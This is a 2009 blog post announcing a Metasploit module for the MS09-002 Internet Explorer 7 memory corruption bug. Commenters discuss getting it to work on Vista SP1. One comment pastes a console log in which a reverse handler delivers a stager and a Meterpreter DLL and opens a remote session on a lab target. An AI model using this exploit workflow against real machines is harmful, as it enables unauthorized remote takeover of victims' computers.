Friday, February 20, 2009

MS09_002 Memory Corruption Update

CG just pushed the code to the Metasploit trunk so go run 'svn update' and enjoy. Any feedback would be good. I'll writeup a little something on it and how the vuln is triggered too when I get a chance.

9 comments:

  1. Thanks for the heads up !

    Wondering, is this exploit only possible on a SP0 version of Vista, or it could work on a SP1 too ? (Considering the ie7 fix hasn't been applied yet...)

    ReplyDelete
  2. I did not have a Vista SP1 image to test it on but try it. The ret used (0x0C..) should be the same. Does sp1 enable opt-out mode for DEP by default? That would include IE7 then I think and that will break the sploit.

    Let me know how it goes.

    ReplyDelete
  3. Building up the Vista sp1 image as we speak. I'll get back to you asap.

    ReplyDelete
  4. Building up the Vista sp1 image as we speak. I'll get back to you asap.

    Hmmm... just tried it, does not seem to work on a test computer running SP1... doing further testing as I don't know if it has the ie7 fix installed.

    ReplyDelete
  5. oddly, mine and the commited module look the same?

    With some slight modifications to the heap code, exploitation on IE7/Vista SP1
    is possible.

    msf exploit(ms09_002_deleteobject) > rexploit
    [*] Exploit running as background job.
    msf exploit(ms09_002_deleteobject) >
    [*] Handler binding to LHOST 172.10.1.103
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:8080/vistasp1
    [*] Local IP: http://172.10.1.103:8080/vistasp1
    [*] Server started.
    [*] Target is Windows Vista
    [*] Sending Internet Explorer 7 Uninitialized Memory Corruption Overflow to 172.10.1.105:49277...
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (172.10.1.103:65535 -> 172.10.1.105:49278)

    msf exploit(ms09_002_deleteobject) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter > sysinfo
    Computer: DA-RIZZLE
    OS : Windows 2000 (Build 6001, Service Pack 1).
    meterpreter >

    ReplyDelete
  6. well overwrite that shizzle with the SP1 version, i'm sure everyone wont mind :-)

    ReplyDelete
  7. Oh yeah, that would be nice, being able to play with sp1 too ! Please update the exploit to support SP1 !

    ReplyDelete
  8. msf exploit(ms09_002_memory_corruption) > exploit
    [*] Exploit running as background job.
    msf exploit(ms09_002_memory_corruption) >
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [-] Exploit failed: Permission denied - bind(2)

    where's the prob? help!

    ReplyDelete
  9. solved my own prob, thanks!

    ReplyDelete